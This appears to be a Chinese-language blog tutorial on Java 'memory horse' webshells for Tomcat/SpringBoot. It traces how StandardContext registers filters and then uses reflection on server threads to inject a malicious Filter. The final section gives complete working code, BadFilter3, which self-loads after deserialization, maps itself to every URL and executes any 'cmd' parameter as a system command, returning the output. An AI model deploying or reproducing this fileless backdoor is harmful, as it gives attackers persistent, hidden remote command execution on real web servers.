MemoryHorse——Filter
内存马概述
所谓得内存马顾名思义就是保存在内存中得后门程序,而对于JavaWeb得内存马来说,因为其使用了容器技术,所以对于内存马来说就像如鱼得水。
内存马分类
总的来说选择内存马都基本上是在servlet之前得,比如filter,他的运行顺序是在servlet之前,或者在MVC架构中controller之前,然后就是Listener,他在运行商位置更靠前,是在Filter之前。其实对于内存马能够用得很多,只要能不影响正常程序得运行就是一条好马,然后就是只要能动态加载得才是有用得马,像FIlter这种是可以通过反射动态添加得。
内存马其实利用都必须存在rce才可以,当然部分文件上传也行,但是在当前得安全大环境下,基本都把文件权限控制得很死,能看到得稍微大点网站都是采用得所有文件都是由servlet进行控制(controller底层还是逃不掉servlet)。
SpringBoot中得Filter马分析
最简单得内存马就是FIlter了,基本上网上得很多分析都是基于Filter马,对如如何构造一个Filter马其实并不难,难得是如何获取将我们构造得内存马打入敌人内部,这时候因为都是基于tomcat容器来运行得,所以我们可以使用反射来动态得将Filter添加进去。至于如何分析,我们可以查看官方文档,看看其运行原理,基本上都会有介绍,只有是否详细得区别;第二种就是自己重写一下然后Debug跟进去,我比较懒就是用Debug跟吧。
Filter自动注入得分析
我们创建一个类实现Filter,然后在Init处下断点,如下,然后自己创建一个Controller访问一下。
我们一直step就会跟到StandardContext 中,到下面这两行代码处
/*** Standard implementation of the <b>Context</b> interface. Each* child container must be a Wrapper implementation to process the* requests directed to a particular servlet.** @author Craig R. McClanahan* @author Remy Maucherat*/public class StandardContext extends ContainerBase implements Context, NotificationEmitter {/*** The set of filter configurations (and associated filter instances) we* have initialized, keyed by filter name.*/private Map<String, ApplicationFilterConfig> filterConfigs = new HashMap<>();/*** The set of filter definitions for this application, keyed by* filter name.*/private Map<String, FilterDef> filterDefs = new HashMap<>();/*** The set of filter mappings for this application, in the order* they were defined in the deployment descriptor with additional mappings* added via the {@link ServletContext} possibly both before and after those* defined in the deployment descriptor.*/private final ContextFilterMaps filterMaps = new ContextFilterMaps();public boolean filterStart() {if (getLogger().isDebugEnabled()) {getLogger().debug("Starting filters");}// Instantiate and record a FilterConfig for each defined filterboolean ok = true;synchronized (filterConfigs) {filterConfigs.clear();for (Entry<String,FilterDef> entry : filterDefs.entrySet()) {String name = entry.getKey();if (getLogger().isDebugEnabled()) {getLogger().debug(" Starting filter '" + name + "'");}try {/**************************************/ApplicationFilterConfig filterConfig =new ApplicationFilterConfig(this, entry.getValue());filterConfigs.put(name, filterConfig);/**************************************/} catch (Throwable t) {t = ExceptionUtils.unwrapInvocationTargetException(t);ExceptionUtils.handleThrowable(t);getLogger().error(sm.getString("standardContext.filterStart", name), t);ok = false;}}}return ok;}}
根据代码我们可以看到filterConfigs存储了整个程序中除了自带得Filter同时还包括了我们自定义得一个CustomerFilter,也可以从方法名filterStart()知道这是对filter初始化得代码块了,我们通过上面两句其实就知道了大概如何操作了,首先获取一个ApplicationFilterConfig对象,初始化需要传入StandardContext对象和filterDef值,然后将filter名和ApplicationFilterConfig对象put到filterConfigs得Map中。其实代码跟到这基本明了了,也大概清楚我们需要得东西了,接下来就是如何获取filterConfigs和StardardContext,因为这两个是需要和当前程序中得保持一致,所以我们想到了使用反射。
思路有了,但是哪里存在StandardContext呢(什么是StandardContext,可以看这个连接:https://www.cnblogs.com/ChenD/p/10061008.html),其实可以用HttpServletRequest对象获取,也就是常见得request,这里我们暂时不考虑用request,我们换种思路,在线程中取,毕竟所有得东西在线程中一定能找到。
获取StandardContext
前面我们说了,我们可以从线程中获取StandardContext,所以我们可以自己调用一下线程,看看里面都有哪些我们可以用到得。记住我们需要StandardContext,而他只有在JavaWeb中才存在,别写个public static void main() 找了半天咋没有呢,咋可能有。
我们在这里下断点,然后调试,我们可以看到存在一个treads线程组,这其中有acceptor和Poller两线程,对于Acceptor可以看官方解释:https://docs.oracle.com/cd/E19159-01/819-3681/abegm/index.html,对于Poller线程也可以看官方解释
至于tomcat得启动流程啥的看这篇:https://myzxcg.com/2021/10/Tomcat-架构与Context分析/
这里得话我先说我们用哪个线程来找对应得数据,这两个线程都是可以得,但是我们先使用Acceptor这个线程
我们可以在具体Evaluate Express功能来筛选一下,表达式如下,当然这是针对Acceptor得,至于Poller大家可以自己看看。
看到上面得话基本上就能知道怎么写了吧,我们可以通过反射一步一步得获取我们需要得值。
反射我们可以封装成一个类,如下
public Object getField(Object object, String fieldName) {Field declaredField;Class clazz = object.getClass();//获取对象得classwhile (clazz != Object.class) {try {declaredField = clazz.getDeclaredField(fieldName);//获取所有声明得变量declaredField.setAccessible(true);//设置成公共得return declaredField.get(object);//获取object对象中declaredField得值} catch (NoSuchFieldException e){}catch (IllegalAccessException e){}clazz = clazz.getSuperclass();//这个得作用主要是获取当前类父类得值,就是个递归,直到触碰到根类Object}return null;}
然后我们知道我们获取得线程组中存在一个threads数组,所以获取他的数组值得操作就像这样得
ThreadGroup threadGroup= Thread.currentThread().getThreadGroup();Thread[] threads=getField(threadGroup,"threads");
接下来得值获取方式也是一样得,后面得说去步骤很多都可以直接套娃就不详细讲了,对于其中可能出现得Map类型,我们就直接按照Map得使用方法拿出来即可,最后我们就能获取到TomcatEmbeddedContext对象,其实间接得也是StandardContext对象,毕竟后者是前者得父类。
至此StandardContext我们已经获取到了,那么接下来就是获取filterConfigs,我们知道我们获取得filterConfigs是在StandardContext对象中,而我们获取到了他的子类,那么我们也能通过反射获取到filterConfigs数组。
所以filterConfigs得获取就是如下这样。
Map filterconfigs=null;filterconfigs=getField("filterConfigs");
我们现在已经把我们需要得东西从内存中去了出来,接下来就是按照下面代码这样得规则来写内存马了。
ApplicationFilterConfig filterConfig =new ApplicationFilterConfig(this, entry.getValue());//this:StandardContext 我们已经拿到了filterConfigs.put(name, filterConfig);//filterConfigs我们也拿到了
添加恶意内存马
首先我们需要检测已经存在得filter名是否和我们要添加得重合了,如果有我们是不能去更改,否则会对正常业务造成损害,然后就是new 一个Filter了。
Filter filter = new Filter() {@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain chain) throws IOException, ServletException {HttpServletRequest request = (HttpServletRequest) servletRequest;String cmd = request.getParameter("cmd");System.out.println("y2an0");if (!"".equals(cmd) && cmd != null) {// Process process = new ProcessBuilder(cmd).start();Process process=Runtime.getRuntime().exec(cmd);byte[] buf = new byte[1024];InputStream inputStream = process.getInputStream();int len=0;int index=0;while ((len= inputStream.read(buf))>0){System.out.println(new String(buf, index, len));servletResponse.getWriter().println(new String(buf, index, len));index+=len;}System.out.println("执行了命令了");process.destroy();}chain.doFilter(servletRequest,servletResponse);}};
至于初始化和destory可以根据自己得需求来增加。这里我们还差一个FilterDef对象,所以新建一个对象,并且赋值。
FilterDef filterDef=new FilterDef();filterDef.setFilterClass(BadFilter2.class.getName());//类名filterDef.setFilterName("y2an0");//filter名,这个在前面我们是进行了判断得filterDef.setFilter(filter);//filter就是我们添加进去得standardContext.addFilterDef(filterDef);
除此之外我们还需要添加一个FilterMap,这其中包含了过滤路径,这才是最终得。
FilterMap filterMap=new FilterMap();filterMap.addURLPattern("/*");//过滤得路径filterMap.setFilterName("y2an0");filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);
然后就是创建一个ApplicationFilterConfig对象了,至于这里为什么使用反射获取此类,因为ApplicationFilterConfig类是被final修饰得。所以只能使用反射获取其构造方法。
ApplicationFilterConfig filterConfig;try {Constructor constructor= ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);constructor.setAccessible(true);filterConfig= (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);filterconfigs.put("y2an0",filterConfig);//上面得操作和我们在StandardContext中看到得几乎是一致得} catch (NoSuchMethodException e) {e.printStackTrace();} catch (InvocationTargetException e) {e.printStackTrace();} catch (InstantiationException e) {e.printStackTrace();} catch (IllegalAccessException e) {e.printStackTrace();}
最后附上完整代码
package com.y2an0.memoryhorse.BadMemoryHorse;import org.apache.catalina.Context;import org.apache.catalina.core.ApplicationFilterConfig;import org.apache.catalina.core.StandardContext;import org.apache.catalina.core.StandardEngine;import org.apache.catalina.core.StandardHost;import org.apache.tomcat.util.descriptor.web.FilterDef;import org.apache.tomcat.util.descriptor.web.FilterMap;import javax.servlet.*;import javax.servlet.http.HttpServletRequest;import java.io.IOException;import java.io.InputStream;import java.io.Serializable;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationTargetException;import java.util.HashMap;import java.util.Iterator;import java.util.Map;public class BadFilter3 implements Serializable {String serverName="y2an0";String filterPath="/*";StandardContext standardContext;static {BadFilter3 badFilter3=new BadFilter3();//方便再反序列化结束后自动加载}public BadFilter3() {this.getStandardContext();this.FilterInsert();}public void FilterInsert() {Map filterconfigs=null;try {Class aClass = standardContext.getClass().getSuperclass();Field filterConfigsO = aClass.getDeclaredField("filterConfigs");filterConfigsO.setAccessible(true);filterconfigs = (Map) filterConfigsO.get(standardContext);} catch (NoSuchFieldException e) {e.printStackTrace();} catch (IllegalAccessException e) {e.printStackTrace();}if (filterconfigs.get(serverName)==null) {Filter filter = (servletRequest, servletResponse, chain) -> {HttpServletRequest request = (HttpServletRequest) servletRequest;String cmd = request.getParameter("cmd");if (!"".equals(cmd) && cmd != null) {Process process=Runtime.getRuntime().exec(cmd);byte[] buf = new byte[1024];InputStream inputStream = process.getInputStream();int len=0;int index=0;while ((len= inputStream.read(buf))>0){System.out.println(new String(buf, index, len));servletResponse.getWriter().println(new String(buf, index, len));index+=len;}System.out.println("执行了命令了");process.destroy();}chain.doFilter(servletRequest,servletResponse);};FilterDef filterDef=new FilterDef();filterDef.setFilterClass(BadFilter3.class.getName());filterDef.setFilterName(serverName);filterDef.setFilter(filter);standardContext.addFilterDef(filterDef);FilterMap filterMap=new FilterMap();filterMap.addURLPattern(filterPath);filterMap.setFilterName(serverName);filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);ApplicationFilterConfig filterConfig;try {Constructor constructor= ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);constructor.setAccessible(true);filterConfig= (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);filterconfigs.put(serverName,filterConfig);} catch (NoSuchMethodException e) {e.printStackTrace();} catch (InvocationTargetException e) {e.printStackTrace();} catch (InstantiationException e) {e.printStackTrace();} catch (IllegalAccessException e) {e.printStackTrace();}}}public Object getField(Object object, String fieldName) {Field declaredField;Class clazz = object.getClass();while (clazz != Object.class) {try {declaredField = clazz.getDeclaredField(fieldName);declaredField.setAccessible(true);return declaredField.get(object);} catch (NoSuchFieldException e){}catch (IllegalAccessException e){}clazz = clazz.getSuperclass();}return null;}public void getStandardContext() {Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");for (Thread thread : threads) {if (thread == null) {continue;}if ((thread.getName().contains("Acceptor")) && (thread.getName().contains("http"))) {Object target = this.getField(thread, "target");HashMap children;Object jioEndPoint = null;try {jioEndPoint = getField(target, "this$0");} catch (Exception e) {}if (jioEndPoint == null) {try {jioEndPoint = getField(target, "endpoint");} catch (Exception e) {return;}}Object service = getField(getField(getField(getField(getField(jioEndPoint, "handler"), "proto"), "adapter"), "connector"), "service");StandardEngine engine = null;try {engine = (StandardEngine) getField(service, "container");} catch (Exception e) {}if (engine == null) {engine = (StandardEngine) getField(service, "engine");}children = (HashMap) getField(engine, "children");StandardHost standardHost = (StandardHost) children.get("localhost");children = (HashMap) getField(standardHost, "children");Iterator iterator = children.keySet().iterator();while (iterator.hasNext()) {String contextKey = (String) iterator.next();// if (!(this.uri.startsWith(contextKey))) {// continue;// }StandardContext standardContext = (StandardContext) children.get(contextKey);this.standardContext = standardContext;return;}}}}}
若有收获,就点个赞吧
0 人点赞
